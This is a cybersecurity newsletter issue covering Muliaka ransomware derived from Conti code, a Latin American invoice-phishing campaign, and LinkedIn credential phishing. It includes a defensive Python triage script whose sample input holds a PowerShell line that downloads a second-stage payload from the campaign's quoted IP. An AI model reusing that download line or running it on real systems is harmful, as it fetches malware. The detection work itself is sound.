Leaked Conti code utilised by ‘Muliaka’ malware

Apr 11 2024



Welcome to Gone Phishing, your daily cybersecurity newsletter that’s your one stop shop for cyber-bound warfare ⚔️🔪🏹🪓🔨

Today’s hottest cybersecurity news stories:

  • 👀 To be Conti-ued… Leaked Conti code utilised by ‘Muliaka’ malware 👾

  • 💃 Latin America watch out! Their phishing lines are out in malicious force 🎣

  • 🤓 Alert! Microsoft two-step phishing campaign targets LinkedIn users 💼

Don’t get Conti with me, mate 💀💀💀

🚨 New Ransomware Gang Strikes Russian Businesses! 🔒

A previously unknown ransomware gang, dubbed "Muliaka" by researchers at F.A.C.C.T., is targeting Russian businesses with malware derived from the leaked source code of the Conti hacking group. This elusive group, also known as Muddy Water, has been active since at least December 2023, leaving behind minimal traces of their attacks.

Intricate Attack Methodology 🎯

In a recent incident documented by F.A.C.C.T., Muliaka encrypted Windows systems and VMware ESXi virtual infrastructure of an unnamed Russian business. The attackers exploited the company's VPN service for remote access and disguised their ransomware as popular corporate antivirus software, facilitating infiltration into the targeted network.

Advanced Features of Muliaka's Malware 🛠️

Unlike the original Conti malware, Muliaka's variant is equipped with advanced functionalities. It terminates processes and halts specific system services before initiating file encryption, representing a significant evolution in malicious tools post-Conti leak.

Geopolitical Dynamics Fuel Cyberattacks 🌐

F.A.C.C.T. warns that financially motivated hacker groups, leveraging the current geopolitical situation in Russia, are intensifying their assaults. The lure of easy money combined with a lack of cybersecurity awareness among potential victims creates an environment ripe for exploitation.

Unveiling the Unknown 🕵️

Despite their efforts, researchers have yet to determine the origins or the ransom amounts demanded by Muliaka. The targeted company's response to the ransom remains undisclosed.

Stay Protected! 🛡️

Remain vigilant against phishing attempts, bolster your cybersecurity defences, and prioritise regular data backups to mitigate the risks posed by emerging ransomware threats like Muliaka. Stay informed to stay secure!


Fresh phish; we’re reeling them in 🎣🎣🎣

🚨 Beware: Phishing Campaign Targeting Latin America Uncovered! 🎣

A recent phishing campaign has emerged, targeting the Latin American region. The devious tactic involves sending emails with ZIP file attachments, posing as invoices. Upon extraction, these files reveal HTML documents leading to malicious downloads, initiating a cascade of cyber threats.

Dissecting the Tactics 🛠️

Examining the email headers, we detected email addresses using the domain 'temporary[.]link' and noted the use of Roundcube Webmail, commonly exploited in phishing endeavours. The HTML files contain concatenated URLs, often leading to suspended pages upon access.

Unveiling the Hosts 🌐

Further investigation revealed the host IP, 89[.]116[.]32[.]138, housing newly created domains, some registered in Mexico. Accessing these URLs from Mexico-based IPs redirects to a Cloudflare captcha page, masking malicious intentions.

Malicious Payloads Uncovered 🕵️

Inside the RAR files lurk PowerShell scripts, extracting sensitive information from victims' machines. Base64 encoded strings within the scripts trigger additional URL requests, ultimately leading to malware downloads.
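The chain described above (archive attachment, Roundcube-sent mail from the quoted domain, PowerShell hiding its next-stage URL in Base64) lends itself to a small triage script. The following is an added example written for this page, not code from the researchers or the article: it refangs the indicators quoted in the text, flags the header traits mentioned, and decodes Base64 runs in a PowerShell script so the hidden URLs can be matched against the watchlist. The sample headers and script are constructed for demonstration; the only real values are the defanged domain and IP quoted in the article.

```python
"""Triage helper for an invoice-themed phishing chain (added example).

Refangs the indicators quoted in the article, flags the header traits the
researchers mention (a 'temporary[.]link' sender, Roundcube Webmail, an
archive attachment) and decodes Base64 blobs in a PowerShell script to
surface the URLs they hide. Sample headers and script are constructed.
"""
import base64
import re

# Indicators quoted in the article, kept defanged as published.
DEFANGED_IOCS = ["temporary[.]link", "89[.]116[.]32[.]138"]

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
ARCHIVE_EXT = (".zip", ".rar")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its literal form for matching."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def header_findings(headers: dict, iocs: list) -> list:
    """Reasons an email's header block matches the campaign traits."""
    findings = []
    watch = {refang(i).lower() for i in iocs}
    sender = headers.get("From", "")
    domain = sender.rsplit("@", 1)[-1].strip("<> ").lower()
    if domain in watch:
        findings.append(f"sender domain on watchlist: {domain}")
    agent = (headers.get("User-Agent", "") + headers.get("X-Mailer", "")).lower()
    if "roundcube" in agent:
        findings.append("sent via Roundcube Webmail")
    for name in headers.get("Attachments", []):
        if name.lower().endswith(ARCHIVE_EXT):
            findings.append(f"archive attachment: {name}")
    return findings


def decode_base64_blobs(text: str) -> list:
    """Decode every plausible Base64 run, trying UTF-8 then UTF-16LE
    (the encoding PowerShell uses for -EncodedCommand)."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # not valid Base64 (e.g. a long identifier)
        for enc in ("utf-8", "utf-16le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(c.isprintable() or c.isspace() for c in s):
                decoded.append(s)
                break
    return decoded


def hidden_urls(script: str) -> list:
    """URLs that only appear after decoding Base64 strings in a script."""
    urls = []
    for s in decode_base64_blobs(script):
        urls.extend(URL_RE.findall(s))
    return urls


def ioc_hits(urls: list, iocs: list) -> list:
    """Subset of URLs that contain a refanged watchlist indicator."""
    fanged = [refang(i).lower() for i in iocs]
    return [u for u in urls if any(f in u.lower() for f in fanged)]


def triage(headers: dict, script: str, iocs: list) -> dict:
    """Combine header and script findings into a single verdict."""
    findings = header_findings(headers, iocs)
    urls = hidden_urls(script)
    hits = ioc_hits(urls, iocs)
    verdict = "suspicious" if (hits or len(findings) >= 2) else "benign"
    return {"header_findings": findings, "hidden_urls": urls,
            "ioc_hits": hits, "verdict": verdict}


# Constructed sample input: a sender on the quoted domain, Roundcube as the
# mail agent, a ZIP "invoice", and a script whose download URL is Base64.
SAMPLE_HEADERS = {
    "From": "Facturacion <cobranza@temporary.link>",
    "User-Agent": "Roundcube Webmail/1.6",
    "Attachments": ["Factura_2024-04.zip"],
}
_STAGE2 = base64.b64encode(b"http://89.116.32.138/stage2.rar").decode()
SAMPLE_SCRIPT = f"""
$u = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_STAGE2}'))
Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\s2.rar
"""

if __name__ == "__main__":
    print(triage(SAMPLE_HEADERS, SAMPLE_SCRIPT, DEFANGED_IOCS))
```

The verdict rule is deliberately simple (any watchlist hit, or two or more header traits); in practice the decoded URLs and refanged indicators would be fed into the mail gateway's blocklist or a SIEM lookup rather than decided inline.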

The Horabot Connection 🔄

This campaign exhibits striking resemblances to previous "Horabot" campaigns, reinforcing the notion of evolving tactics in phishing schemes.

Staying Vigilant 🛡️

Phishing campaigns constantly evolve to evade detection. Be cautious of email attachments or URLs, particularly those leading to suspended pages, as they may harbour hidden threats. Stay informed and maintain a vigilant stance against evolving cyber threats.

Stay Alert! 🚨

As threat actors employ increasingly sophisticated techniques, it's imperative to exercise caution with email attachments and URLs. By remaining vigilant and adopting robust cybersecurity practices, we can mitigate the risks posed by evolving phishing campaigns.

🎣 Catch of the Day!! 🌊🐟🦞

🃏 The Motley Fool: “Fool me once, shame on — shame on you. Fool me — you can't get fooled again.” Good ol’ George Dubya 😂 Let us tell you who’s not fooling around though; that’s the Crüe 👀 at Motley Fool. You’d be a fool (alright, enough already! 🙈) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! 🐛 Kidding aside, if you check out their website they’ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets 🤑 (LINK)

🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the Free and the Home of the Brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels set Wander apart from your run-of-the-mill American getaway 🏞️😍 (LINK)

🌊 Digital Ocean: If you build it they will come. Nope, we’re not talking about a baseball field for ghosts 👻🍿 (Great movie, to be fair 🙈). This is Digital Ocean, who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can and you’re looking for somewhere to test things out, launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

What do you call it, garage?

What do you call it, urban?

What do you call it, two-step? 🙈🙈🙈

🚨 Tackling Social Media Threats in Browser Security 🛡️

As social media platforms like Facebook and LinkedIn seep into daily corporate communication, employees accessing personal accounts on company devices unwittingly become targets for cyber threats.

Exploiting Social Networks 🕵️

Attackers now leverage employees' social media accounts to steal personal and corporate data. For instance, a recent Python-based Snake infostealer used Facebook messages to distribute malware, aiming to hijack accounts and pilfer browsing data.

Networking Risks 🔄

LinkedIn, a hub for professional connections, is ripe for exploitation. Attackers use breached accounts to mimic trusted contacts and lure victims into clicking malicious links, ultimately stealing Microsoft 365 credentials.

Unmasking LinkedIn's Two-Step Attack 🎭

Compromised LinkedIn profiles pose as trusted contacts, tricking victims into clicking OneDrive links. These links lead to phishing pages mimicking familiar interfaces, ultimately stealing Microsoft 365 credentials, orchestrated by organised threat actors.

Advanced Browser Security 🛠️

Advanced browser security extensions, like Perception Point Enterprise Browser Security, employ AI-driven detection to thwart attacks in real time. By leveraging image recognition and URL reputation analysis, these solutions fortify enterprise devices against evolving cyber threats.

The Imperative of Browser Security 🚨

As social media becomes a target for sophisticated threat actors, organisations must prioritise comprehensive browser security solutions. By staying vigilant and investing in advanced detection technologies, enterprises can mitigate the risk of social media-based attacks, safeguarding privacy and data integrity.

Stay Informed, Stay Secure! 🛡️

Vigilance is key in navigating social media threats. By adopting robust security measures and investing in browser security solutions, organisations can effectively safeguard their digital assets.

🗞️ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think!

So long and thanks for reading all the phish!
